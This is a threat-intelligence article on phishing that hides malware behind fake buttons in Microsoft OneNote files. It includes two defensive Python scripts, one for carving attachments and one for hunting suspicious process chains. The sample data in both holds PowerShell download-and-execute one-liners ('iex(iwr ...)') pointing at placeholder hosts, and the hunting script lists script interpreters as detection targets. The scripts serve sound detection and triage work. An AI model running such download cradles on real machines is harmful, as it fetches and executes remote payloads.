A recent Varonis report exposes a rising threat: cyber criminals exploiting Microsoft OneNote to launch “native” phishing campaigns via Microsoft 365. OneNote is a well-established digital note-taking app that provides a single place for keeping users' reminders, research and project information. These attacks exploit trust in legitimate collaboration tools, combining social engineering and cloud infrastructure to bypass traditional defenses. The vector uses shared OneNote notebooks to deliver embedded malware or credential-stealing links, all concealed beneath innocuous-looking surfaces, exploiting users’ confidence in a trusted ecosystem.[1]
See: https://redskyalliance.org/xindustry/greatness-in-phishing
After Microsoft began blocking macros by default in Office documents downloaded from the internet in mid-2022, threat actors pivoted to alternative file types. OneNote emerged as an ideal carrier: it is preinstalled with Office and Microsoft 365, commonly used in organizations, and its .one files were not flagged as suspicious by email gateways. Crucially, OneNote files can embed attachments (VBScript, HTA, BAT and LNK files) hidden beneath fake buttons that mimic legitimate prompts. When users click “Double click to view,” they unwittingly execute the embedded file, which may download a RAT, steal credentials, or implant further malware.
Campaigns often mimic shipping notifications, invoices or internal memos. The OneNote notebook appears to contain a benign document, but the embedded scripts drop malware payloads (e.g., AsyncRAT, Redline, AgentTesla, Qakbot, IcedID, DOUBLEBACK) once the user interacts. The attachments, camouflaged with PNG or PDF icons, launch batch or PowerShell scripts that fetch remote executables, typically staged through Temp folders or hidden HTA files. In many cases, antivirus tools failed to detect the OneNote-hosted payloads, showing that behavioral rather than signature-based defenses are needed.
The attack hinges on social engineering. These campaigns are effective because users trust Microsoft 365 files sent within familiar workflows. Even when OneNote warns that opening an attachment could harm the computer, users often click through the alert. Moreover, nested attachments (a batch file calling an HTA, which runs PowerShell, which deploys the malware) obscure the threat chain.
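The embedding mechanism described above has a useful property for defenders: every file a user drags into a notebook is stored as a FileDataStoreObject, a structure documented in Microsoft's MS-ONESTORE specification, so the raw attachment can be recovered without rendering the page or trusting the icon drawn over it. The following triage script is an added example written for this article, not code from the original report or from Microsoft; the GUIDs and field layout come from MS-ONESTORE, while the sample notebook bytes and the URL inside the sample dropper are constructed for the demonstration.

```python
"""Carve embedded attachments out of a OneNote (.one) file for triage.

Added example; not code from the original article. It relies only on the
FileDataStoreObject layout from Microsoft's MS-ONESTORE specification:
  guidHeader (16) | cbLength (8, little-endian) | unused (4) | reserved (8)
  | FileData (cbLength bytes) | guidFooter (16)
Every file a user drags into a notebook is stored in one such object, so a
scanner that finds the header GUID recovers the raw attachment regardless of
the icon or "Double click to view" graphic drawn over it.
"""
from __future__ import annotations

import struct
import sys
from dataclasses import dataclass

# {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} in on-disk GUID byte order.
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
# {71FBA722-0F79-4A0B-BB13-899256426B24} in on-disk GUID byte order.
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
HEADER_LEN = 16 + 8 + 4 + 8  # guidHeader + cbLength + unused + reserved


def classify(data: bytes) -> str:
    """Rough type label from magic bytes or leading script text (triage only)."""
    if data.startswith(b"MZ"):
        return "pe-executable"
    if data.startswith(b"\x4c\x00\x00\x00\x01\x14\x02\x00"):
        return "lnk-shortcut"
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"\x89PNG"):
        return "png"
    head = data[:256].lstrip().lower()
    if head.startswith(b"@echo") or head.startswith(b"start ") or b"cmd /c" in head:
        return "batch-script"
    if b"<script" in head or b"<hta:application" in head:
        return "hta-or-html"
    if b"wscript" in head or b"createobject(" in head:
        return "vbscript-or-jscript"
    if b"powershell" in head or b"invoke-expression" in head:
        return "powershell-launcher"
    return "unknown"


@dataclass
class EmbeddedFile:
    offset: int      # where the FileDataStoreObject header starts
    size: int        # cbLength as stored in the object
    kind: str
    data: bytes
    footer_ok: bool  # False if the footer GUID is missing (corrupt or crafted)


def carve_embedded_files(blob: bytes) -> list[EmbeddedFile]:
    """Return every embedded file found by scanning for the header GUID."""
    found: list[EmbeddedFile] = []
    pos = blob.find(FDSO_HEADER)
    while pos != -1:
        if pos + HEADER_LEN > len(blob):
            break
        (size,) = struct.unpack_from("<Q", blob, pos + 16)
        start, end = pos + HEADER_LEN, pos + HEADER_LEN + size
        if end > len(blob):  # truncated object or lying cbLength: stop, never over-read
            break
        data = blob[start:end]
        footer_ok = blob[end:end + 16] == FDSO_FOOTER
        found.append(EmbeddedFile(pos, size, classify(data), data, footer_ok))
        pos = blob.find(FDSO_HEADER, end)
    return found


def build_sample_notebook() -> bytes:
    """Constructed test input (not a real notebook): filler bytes, a decoy PNG
    and a batch dropper, each wrapped as a FileDataStoreObject."""
    def wrap(payload: bytes) -> bytes:
        return (FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 12
                + payload + FDSO_FOOTER)
    decoy = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    dropper = (b"@echo off\r\n"
               b"powershell -w hidden -c \"iex(iwr http://example.invalid/p)\"\r\n")
    return b"\x00" * 32 + wrap(decoy) + b"\x00" * 8 + wrap(dropper) + b"\x00" * 16


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_notebook()
    for f in carve_embedded_files(blob):
        print(f"offset={f.offset:#x} size={f.size} kind={f.kind} footer_ok={f.footer_ok}")
```

Run it against a quarantined .one attachment to list what is actually embedded; a notebook that claims to hold one PDF but carves out a batch file or an HTA is a good candidate for detonation. The scanner deliberately stops when cbLength points past the end of the file rather than trusting the length, and it reports a missing footer GUID instead of silently accepting a malformed object.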
Reddit commentators corroborate these findings. One noted: “It’s dumber than it sounds. You can drag and drop a .vbs or .js file right on top of a OneNote file… Crazy part is you can put a big blue piece of text… and the clicks run the executable.” Another warned: “If you don’t use .one… delete on sight any messages with one attached no matter who they are from.”
The tactic has proliferated since December 2022. Proofpoint recorded just six campaigns that month, rising to more than fifty by January 2023. Notable malware families included AsyncRAT, Redline, AgentTesla, DOUBLEBACK and Qakbot (the latter delivered by TA577).
This technique now spans banking malware, RATs, and infostealers; telemetry shows infections across sectors including manufacturing, telecoms and high tech.
Sound advice calls for a layered defense: enforce multi-factor authentication (MFA), tighten conditional access, and adjust sharing settings to restrict unwarranted access. Many stress user-centric awareness campaigns that teach staff to hover before clicking and never to follow links in unsolicited OneNote notebooks. Technical controls include blocking inbound .one attachments at the mail gateway, deploying behavior-based endpoint detection, and implementing threat-hunting rules that flag OneNote attachments executed from temporary folders (withsecure.com). Because users can click through OneNote's default warning, monitoring script execution events, in particular script hosts spawned by OneNote, is essential.
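The threat-hunting advice above, and the nested batch-to-HTA-to-PowerShell chain described earlier, can be turned into a small set of rules over process-creation telemetry. The script below is an added example written for this article, not a rule shipped by WithSecure, Microsoft or any other vendor. It assumes a simplified Sysmon-style event shape (one dict per process start, with parent and child image paths, process IDs and command line) and relies on the publicly reported behaviour that OneNote writes a double-clicked attachment under a Temp\OneNote\...\Exported\ folder before launching it; the path pattern is matched loosely and should be treated as an assumption to validate against your own telemetry. All events are constructed for the demonstration.

```python
"""Hunt for OneNote-launched script chains in process-creation telemetry.

Added example; not code from the original article or from any vendor product.
Events are a constructed, simplified Sysmon-style shape (one dict per process
start). Three rules cover the chain described in the article: OneNote directly
spawning a script host, execution of a file from the folder OneNote exports
embedded attachments to, and an interpreter whose ancestry leads back to
OneNote even when an intermediate stage (batch, HTA) hides the direct link.
"""
from __future__ import annotations

import ntpath
import re

INTERPRETERS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
RISKY_EXT = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".lnk", ".exe")
# OneNote writes a double-clicked attachment under
# %LOCALAPPDATA%\Temp\OneNote\<version>\Exported\{GUID}\NT\0\ before launching it.
# Assumption: match loosely on the stable parts of that path, up to a quote or space.
EXPORTED_RE = re.compile(r"\\temp\\onenote\\[^\\]+\\exported\\[^\"\s]*", re.IGNORECASE)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def hunt(events: list[dict], max_depth: int = 4) -> list[dict]:
    """Return one alert per suspicious event, each with the rules that fired."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        reasons = []
        img, parent = _base(e["Image"]), _base(e.get("ParentImage", ""))
        cmd = e.get("CommandLine", "")
        # Rule 1: OneNote itself spawns a script host or other LOLBin.
        if parent == "onenote.exe" and img in INTERPRETERS:
            reasons.append("onenote spawned interpreter")
        # Rule 2: something runs a risky file out of the exported-attachment cache.
        m = EXPORTED_RE.search(cmd)
        if m and m.group(0).lower().endswith(RISKY_EXT):
            reasons.append("executes file from OneNote exported-attachment cache")
        # Rule 3: interpreter whose ancestry reaches OneNote through intermediate stages.
        if img in INTERPRETERS and parent != "onenote.exe":
            cur, depth = e, 0
            while depth < max_depth:
                cur = by_pid.get(cur.get("ParentProcessId"))
                if cur is None:
                    break
                depth += 1
                if _base(cur["Image"]) == "onenote.exe":
                    reasons.append(f"interpreter descended from OneNote ({depth} hops)")
                    break
        if reasons:
            alerts.append({"ProcessId": e["ProcessId"], "Image": img, "reasons": reasons})
    return alerts


# Constructed sample telemetry (not real logs). One benign hyperlink click, one
# malicious double-click on an embedded Open.bat that stages an HTA and PowerShell,
# and one unrelated PowerShell launched from Explorer.
ONENOTE = r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
EXPORTED = r"C:\Users\alice\AppData\Local\Temp\OneNote\16.0\Exported\{7E4A1C2F-9B3D-4E61-8A0F-5C2D1B7E9A33}\NT\0"


def _ev(pid: int, ppid: int, image: str, parent: str, cmdline: str) -> dict:
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent, "CommandLine": cmdline}


SAMPLE_EVENTS = [
    _ev(100, 1, EXPLORER, r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    _ev(200, 100, ONENOTE, EXPLORER, r'"ONENOTE.EXE" C:\Users\alice\Downloads\Invoice_2023.one'),
    _ev(210, 200, EDGE, ONENOTE, "msedge.exe https://intranet.example.invalid/"),
    _ev(220, 200, CMD, ONENOTE, 'cmd /c "' + EXPORTED + r'\Open.bat"'),
    _ev(230, 220, MSHTA, CMD, r"mshta C:\Users\alice\AppData\Local\Temp\Stage2.hta"),
    _ev(240, 230, POWERSHELL, MSHTA, 'powershell -w hidden -nop -c "iex(iwr http://example.invalid/s3)"'),
    _ev(300, 100, POWERSHELL, EXPLORER, "powershell.exe"),
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(a["ProcessId"], a["Image"], "; ".join(a["reasons"]))
```

Only the cmd.exe, mshta.exe and powershell.exe events in the malicious chain are flagged; the browser launched from a notebook hyperlink and the unrelated PowerShell from Explorer are not. Rule 3 is what defeats the nesting the article describes: once OneNote has handed off to a batch file, neither the HTA nor the PowerShell stage has OneNote as its direct parent, so a parent-child rule alone misses them. Mapping real Sysmon Event ID 1 or EDR fields onto the dict keys used here is a one-line transform.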
OneNote-based phishing epitomizes how attackers exploit living-off-the-land techniques and no-code tools within cloud ecosystems. By hiding malicious payloads in ostensibly benign collaboration artefacts, they can outflank signature-based defenses. Putting it bluntly: “It’s not just about securing systems; it’s about securing people.”
Defense demands both technical vigilance (blocking suspicious file types, tightening sharing protocols, deploying behavioral detection) and ongoing user education. The moment a malicious notebook lands in an inbox, the window for exploitation opens.
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.cybersecurityintelligence.com/blog/the-new-face-of-phishing-8573.html